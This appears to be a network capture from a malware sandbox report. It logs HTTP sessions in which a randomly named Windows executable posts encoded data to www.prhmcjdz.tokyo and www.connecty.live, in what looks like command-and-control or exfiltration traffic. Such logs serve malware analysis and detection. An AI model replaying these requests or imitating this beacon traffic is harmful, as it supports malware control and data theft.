                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.4499588.210.46.21804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:29.093018055 CET748OUTPOST /cm9a/ HTTP/1.1
                                                                                      Host: www.prhmcjdz.tokyo
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.prhmcjdz.tokyo
                                                                                      Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 56 70 6b 75 33 6d 4f 55 4a 46 44 4b 4e 4b 66 44 5a 68 2b 33 36 48 49 6f 70 67 6e 2f 4c 63 35 53 6f 75 39 69 5a 35 73 54 50 76 4d 37 68 7a 46 37 55 33 66 67 78 36 54 59 49 68 73 56 49 78 70 54 42 47 37 64 4f 69 33 2b 68 54 65 37 2f 79 35 53 47 6a 55 65 57 65 2b 4e 2b 74 79 49 44 46 61 41 46 2f 69 31 62 35 61 2f 38 6e 6b 2b 53 72 39 45 57 7a 73 4a 6f 70 6f 64 61 75 71 57 4e 34 71 68 6b 70 55 73 53 72 46 6d 6e 64 5a 53 37 2f 6d 61 4d 6b 42 67 48 4d 52 5a 31 4d 52 6a 68 39 36 35 55 46 5a 31 4d 67 5a 4d 69 54 2f 6e 4e 33 57 47 46 66 4b 76 63 58 70 5a 45 7a 70 38 64 67 63 61 48 52 43 55 2f 64 57 64 76 77 3d
                                                                                      Data Ascii: 3vNdCBvX=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Lc5Sou9iZ5sTPvM7hzF7U3fgx6TYIhsVIxpTBG7dOi3+hTe7/y5SGjUeWe+N+tyIDFaAF/i1b5a/8nk+Sr9EWzsJopodauqWN4qhkpUsSrFmndZS7/maMkBgHMRZ1MRjh965UFZ1MgZMiT/nN3WGFfKvcXpZEzp8dgcaHRCU/dWdvw=
                                                                                      Nov 24, 2024 08:11:30.667376995 CET508INHTTP/1.1 200
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:11:30 GMT
                                                                                      Content-Type: application/json;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Origin
                                                                                      Vary: Access-Control-Request-Method
                                                                                      Vary: Access-Control-Request-Headers
                                                                                      Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                      Access-Control-Allow-Credentials: true
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.4499658.210.46.21804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:31.761451006 CET10830OUTPOST /cm9a/ HTTP/1.1
                                                                                      Host: www.prhmcjdz.tokyo
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.prhmcjdz.tokyo
                                                                                      Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 56 70 6b 75 33 6d 4f 55 4a 46 44 4b 4e 4b 66 44 5a 68 2b 33 36 48 49 6f 70 67 6e 2f 4b 6b 35 53 61 57 39 6b 4c 52 73 42 2f 76 4d 6c 78 7a 45 37 55 33 34 67 78 69 66 59 49 38 4f 56 4c 5a 70 54 69 2b 37 4d 76 69 33 72 78 54 65 6b 76 79 6b 63 6d 6a 42 65 56 6d 36 4e 2b 39 79 49 44 46 61 41 45 50 69 7a 50 6c 61 39 38 6e 6e 76 53 72 68 41 57 7a 41 4a 6f 42 53 64 61 61 55 57 63 59 71 68 45 35 55 75 67 7a 46 36 33 64 58 48 37 2b 31 61 4d 59 65 67 47 68 2f 5a 31 52 32 6a 6d 56 36 6f 51 6f 69 70 66 49 55 65 43 62 77 30 39 50 63 42 57 37 39 33 4f 65 55 64 6c 58 76 6d 2f 73 30 53 57 67 76 4e 4b 31 53 4a 59 67 48 4a 78 63 7a 6e 62 37 74 66 36 34 2b 2b 7a 68 4a 31 35 42 49 4a 2f 42 58 55 68 50 54 58 63 31 57 43 2b 33 59 65 6b 55 63 53 6d 31 76 79 62 51 66 62 6b 41 62 32 63 61 71 2f 79 6e 6f 62 62 67 50 47 4d 75 63 50 35 6d 4c 55 48 69 55 66 61 53 39 6e 70 48 4c 79 38 64 54 64 46 32 4f 63 4b 59 54 37 70 6c 7a 64 43 78 77 4a 74 66 6d 57 68 50 6d 69 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Kk5SaW9kLRsB/vMlxzE7U34gxifYI8OVLZpTi+7Mvi3rxTekvykcmjBeVm6N+9yIDFaAEPizPla98nnvSrhAWzAJoBSdaaUWcYqhE5UugzF63dXH7+1aMYegGh/Z1R2jmV6oQoipfIUeCbw09PcBW793OeUdlXvm/s0SWgvNK1SJYgHJxcznb7tf64++zhJ15BIJ/BXUhPTXc1WC+3YekUcSm1vybQfbkAb2caq/ynobbgPGMucP5mLUHiUfaS9npHLy8dTdF2OcKYT7plzdCxwJtfmWhPmiBBjRtSFzgx7jYrpJfNwlgYXku7xWnRPy8oEqWflSIefiX60r+tJr026CKnTKOS61D03LNJ8bO9pkDhAKp/unVZT6skfv1joeYOL3mOOgRJ/PrLDybahLaIFr6u7TwQKe5KODKh3EH7yPoQC8PYCqU3G/zox+/r56fsT+UICOSvaW1RVR56F6DyJBO6um+nDDhGiSt/1MgSZmcDu1DzZEv0WdQ9igttlyezENkAXiTl/ShT5ZrD8k83sLCDnwKL+OHMyDV9n5KRBr9/spH15mgrT7ttMsQ5utn0fAbl4SKNJy81nQKI8BATlSB0fYLTsW0R1a/o9SYJhfaxTZsUtfQv/DKuS8zV6QcK0mzkfFLa9sRy0aD4YezqETiSsBu04NKnIoF0U3SIbWiUrYJpjRJIlzTFNMo/ctxG6i34uJBfJ7OBzR8MbNAAfAEu1qtK7b/n7X2oUu2mn6WGJXuteQ6BmjB4Vo4V74uPgqi5x7vGAKhi3hxwt3A2q/V/99hWg68QVHUBgXO/Ku5abp7VLJWPydhzhRDpk7qxHHPjQdwuZaGarMTOvtmURkbK+jKb8XXMd1T9otou4nWoj2FvyTLr8SOcmPh/dXKGg7LttIMqUq3rSIwhaxHz8AI5RnVRDn6eXrTKpruJ4ZQXHsQxMv6TgTmGdkX/bUNf [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.4499728.210.46.21804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:34.426321983 CET462OUTGET /cm9a/?etx=BXy4elO0X&3vNdCBvX=AvN42DnS9Qw3kn1S+XKBV+xTI9DBYK88wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvqBbKt/3mV1eMDkmtL8V6ExRSF03F7PAG84A= HTTP/1.1
                                                                                      Host: www.prhmcjdz.tokyo
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:11:36.002583027 CET427INHTTP/1.1 200
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:11:35 GMT
                                                                                      Content-Type: application/json;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Origin
                                                                                      Vary: Access-Control-Request-Method
                                                                                      Vary: Access-Control-Request-Headers
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-Cache: MISS
                                                                                      Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.449991203.161.43.228804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:41.601778984 CET725OUTPOST /6urf/ HTTP/1.1
                                                                                      Host: www.connecty.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.connecty.live
                                                                                      Referer: http://www.connecty.live/6urf/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 205
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 47 2b 70 70 4d 39 34 72 31 6e 45 71 72 42 63 55 78 79 66 36 2b 6c 41 68 35 71 37 37 56 42 35 37 56 51 6c 49 43 6e 4a 54 63 71 52 32 39 68 56 55 30 51 6c 4f 51 64 52 4e 30 44 54 79 49 79 55 48 45 54 77 52 76 64 6a 64 31 76 49 48 39 54 52 52 64 35 34 32 69 6e 36 4b 4a 36 4b 54 61 66 31 63 76 37 58 31 49 2f 65 49 67 75 4f 33 6e 70 79 37 33 59 78 78 30 34 53 41 6d 52 36 46 50 45 4b 76 4e 4d 44 41 46 46 45 4f 70 68 4b 6b 6a 6e 38 33 76 35 79 6e 65 51 66 6f 68 6e 35 78 6d 53 68 56 43 39 55 51 7a 52 4a 4c 32 47 43 76 62 74 70 6e 33 57 58 6c 4b 51 3d 3d
                                                                                      Data Ascii: 3vNdCBvX=o8IUFI7bomKMG+ppM94r1nEqrBcUxyf6+lAh5q77VB57VQlICnJTcqR29hVU0QlOQdRN0DTyIyUHETwRvdjd1vIH9TRRd542in6KJ6KTaf1cv7X1I/eIguO3npy73Yxx04SAmR6FPEKvNMDAFFEOphKkjn83v5yneQfohn5xmShVC9UQzRJL2GCvbtpn3WXlKQ==
                                                                                      Nov 24, 2024 08:11:42.908219099 CET658INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:11:42 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 514
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.449997203.161.43.228804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:44.343024969 CET745OUTPOST /6urf/ HTTP/1.1
                                                                                      Host: www.connecty.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.connecty.live
                                                                                      Referer: http://www.connecty.live/6urf/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 225
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 48 64 78 70 4b 65 51 72 6b 58 45 74 68 68 63 55 2f 53 66 2b 2b 6c 45 68 35 76 4c 72 56 55 70 37 57 78 56 49 44 69 31 54 66 71 52 32 32 42 56 52 36 77 6c 56 51 64 63 36 30 42 48 79 49 79 77 48 45 57 4d 52 73 75 62 53 36 66 49 46 32 7a 52 70 44 4a 34 32 69 6e 36 4b 4a 36 65 31 61 66 64 63 73 4c 6e 31 4a 62 4b 50 6a 75 4f 32 67 70 79 37 7a 59 78 31 30 34 54 6c 6d 51 6d 72 50 42 47 76 4e 4d 54 41 45 55 45 52 38 78 4c 4f 74 48 39 42 75 62 48 73 48 6b 47 47 68 68 31 44 75 52 68 70 4b 62 5a 4b 69 67 6f 63 6b 47 6d 63 47 71 67 54 36 56 71 73 52 65 4e 69 70 55 39 53 74 72 48 6b 72 39 4a 36 49 72 7a 64 7a 67 63 3d
                                                                                      Data Ascii: 3vNdCBvX=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVUp7WxVIDi1TfqR22BVR6wlVQdc60BHyIywHEWMRsubS6fIF2zRpDJ42in6KJ6e1afdcsLn1JbKPjuO2gpy7zYx104TlmQmrPBGvNMTAEUER8xLOtH9BubHsHkGGhh1DuRhpKbZKigockGmcGqgT6VqsReNipU9StrHkr9J6Irzdzgc=
                                                                                      Nov 24, 2024 08:11:45.590243101 CET658INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:11:45 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 514
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.450004203.161.43.228804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:47.008352995 CET10827OUTPOST /6urf/ HTTP/1.1
                                                                                      Host: www.connecty.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Origin: http://www.connecty.live
                                                                                      Referer: http://www.connecty.live/6urf/
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: no-cache
                                                                                      Content-Length: 10305
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Data Raw: 33 76 4e 64 43 42 76 58 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 48 64 78 70 4b 65 51 72 6b 58 45 74 68 68 63 55 2f 53 66 2b 2b 6c 45 68 35 76 4c 72 56 58 4a 37 57 47 39 49 46 46 68 54 65 71 52 32 2f 68 56 51 36 77 6b 48 51 64 55 32 30 42 62 49 49 30 30 48 48 30 30 52 37 76 62 53 74 76 49 46 35 54 52 53 64 35 35 2b 69 6e 71 4f 4a 36 4f 31 61 66 64 63 73 4a 2f 31 5a 2f 65 50 6c 75 4f 33 6e 70 79 2f 33 59 78 4e 30 34 71 59 6d 51 79 56 50 31 36 76 4e 74 6a 41 48 69 34 52 68 42 4c 4d 67 6e 39 4a 75 62 62 6a 48 6c 75 67 68 68 6f 65 75 57 52 70 50 61 77 67 33 51 30 49 79 6b 4f 68 66 4c 55 69 78 6e 47 57 51 74 64 4a 35 45 39 48 2b 35 37 47 6a 36 78 77 4e 4c 66 75 6e 45 63 76 64 68 79 55 66 4c 69 57 4d 35 32 57 59 44 43 6e 32 51 54 47 48 66 37 4c 66 38 59 47 76 4c 6d 37 58 72 54 63 73 42 4d 38 61 32 71 6e 31 50 4f 69 39 51 6b 34 36 2f 33 70 67 38 6b 4c 76 4d 6d 78 6b 67 38 33 47 2f 4e 74 78 61 6e 77 4f 53 37 45 49 51 74 34 4a 6d 68 58 2f 54 48 74 72 6f 4b 6f 36 6e 31 70 39 61 58 34 42 33 72 69 37 53 61 5a 72 [TRUNCATED]
                                                                                      Data Ascii: 3vNdCBvX=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVXJ7WG9IFFhTeqR2/hVQ6wkHQdU20BbII00HH00R7vbStvIF5TRSd55+inqOJ6O1afdcsJ/1Z/ePluO3npy/3YxN04qYmQyVP16vNtjAHi4RhBLMgn9JubbjHlughhoeuWRpPawg3Q0IykOhfLUixnGWQtdJ5E9H+57Gj6xwNLfunEcvdhyUfLiWM52WYDCn2QTGHf7Lf8YGvLm7XrTcsBM8a2qn1POi9Qk46/3pg8kLvMmxkg83G/NtxanwOS7EIQt4JmhX/THtroKo6n1p9aX4B3ri7SaZrjxmgR9HuJlhyRLBMPto1/8EmVgusiYkTKlSe7tavS1iUiACpC17HpPdFixIhTbN6LWMyU4iKHTj/+Svrf7d+lIjvYKEu2rLwHIJP+Octya2Kb7ctDnJuv9ayVRJZD97zxvP818bld68mU0alAuPI0e+2dUkaVr+IwcLk0ehqtbdetzSm0xLjD5Vp+CxFGmk/1oinVboNPL7haKkw69V6VhhO+TcBhZANAzTNz4QH4fq9Z8jxRoCN8QL8Qvq3qvXLk1rI4rDwnI3/w2g5uES/eXpfeBNxThbI3uYthQNtmRqdNfh1l926UsiurUCqE5cXcCVrrz3nW/cRfCNCecq92JXYGj12juMtFOBj8QHllej5aMT7qnOnDoOGzEjeAPSiR+yvvBW8wEJzHME6tmubhkmXbNxcYzBWRhAct/LE6DPeqsVvnNv+vDsRZrliJrX4FHjjMv5UB/ly/j4DTAwlxE5hluFq9mXhfW65rvMioNc+Mm+Fb5dDAs/c6xn9Qu/0PJt81UGmmTJzRY3MIs8ItHORa2RmLytuYwU8Sl2GCp75m5gDzS75AjCnqxfda1ZFvE2JH2lpcojITJj/PiK2xud9FOksWqglPC5mbMRza+m6Qdr8ICOXmMvv+eEWTgvXKcrWrfrpN8832n6Z6IALh0VMb/Dujm518S [TRUNCATED]
                                                                                      Nov 24, 2024 08:11:48.403644085 CET658INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:11:48 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 514
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.450010203.161.43.228804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:11:49.674581051 CET461OUTGET /6urf/?3vNdCBvX=l+g0G83zvX30P9FiLKUhk1gZnSMwjxKGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR6e8+1gk4cvE7j0i5NK3NPPZTmYTXI7istro=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.connecty.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:11:50.893698931 CET673INHTTP/1.1 404 Not Found
                                                                                      Date: Sun, 24 Nov 2024 07:11:50 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 514
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
